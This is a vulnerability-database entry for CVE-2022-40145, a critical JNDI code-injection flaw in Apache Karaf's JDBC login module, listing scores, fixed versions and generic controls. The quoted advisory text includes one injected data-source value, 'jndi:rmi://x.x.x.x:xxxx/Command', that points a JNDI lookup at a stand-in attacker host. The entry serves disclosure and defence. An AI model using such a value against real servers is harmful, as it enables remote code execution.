CVE-2022-40145
Published: 21 December 2022
Summary
CVE-2022-40145 is a critical-severity Improper Input Validation (CWE-20) vulnerability in Apache Karaf. Its CVSS base score is 9.8 (Critical).
Operationally, ranked in the top 9.7% of CVEs by exploit likelihood; it is not currently listed in the CISA KEV catalog.
Deeper analysis
CVE-2022-40145 is an input-validation flaw in Apache Karaf that permits code injection through an attacker-controlled JNDI LDAP URI supplied as a JDBC data-source name. The vulnerable code path is JDBCUtils.doCreateDatasource, which passes the value of the DATASOURCE option directly to InitialContext.lookup without sanitization; the issue affects all releases up to and including Karaf 4.4.1 and 4.3.7.
An unauthenticated remote attacker who can influence the LDAP server referenced by a Karaf JDBCLoginModule configuration can return a malicious JNDI reference, causing the Karaf instance to execute arbitrary code. Successful exploitation yields full confidentiality, integrity, and availability impact, reflected in the CVSS 9.8 score.
The official Apache Karaf advisory directs users to upgrade to 4.4.2 or 4.3.8, which contain the corrected JDBCUtils implementation that rejects unsafe JNDI schemes.
EPSS remains flat at 0.0539 with no material increase after disclosure, and no confirmed in-the-wild exploitation has been reported.
EU & UK References
- 🇪🇺 ENISA EUVD: EUVD-2022-7591
Vulnerability details
This vulnerable is about a potential code injection when an attacker has control of the target LDAP server using in the JDBC JNDI URL. The function jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasource use InitialContext.lookup(jndiName) without filtering. An user can modify `options.put(JDBCUtils.DATASOURCE, "osgi:" + DataSource.class.getName());` to…
more
`options.put(JDBCUtils.DATASOURCE,"jndi:rmi://x.x.x.x:xxxx/Command");` in JdbcLoginModuleTest#setup. This is vulnerable to a remote code execution (RCE) attack when a configuration uses a JNDI LDAP data source URI when an attacker has control of the target LDAP server.This issue affects all versions of Apache Karaf up to 4.4.1 and 4.3.7. We encourage the users to upgrade to Apache Karaf at least 4.4.2 or 4.3.8
- CWE(s)
Related Threats
No named actor attribution yet. ATT&CK technique mapping in progress for this CVE.
Affected Assets
Mitigating Controls
Likely Mitigating Controls AI
Per-CVE control mapping for this CVE has not run yet; the list below is derived from the weakness types (CWEs) cited in the NVD entry.
Security testing and evaluation at multiple SDLC stages directly detects missing or flawed input validation, with the required remediation process ensuring fixes are applied.
Security testing and developer training directly verify and enforce proper input validation, reducing exploitability of injection and malformed-data weaknesses.
Directly implements checks on information inputs to reject invalid data before processing.
Identifies indicators of injection attacks (command, SQL, LDAP, etc.) via anomaly and attack monitoring.
Spam protection mechanisms perform filtering and detection on inbound/outbound messages, directly compensating for missing or weak input validation of unsolicited content.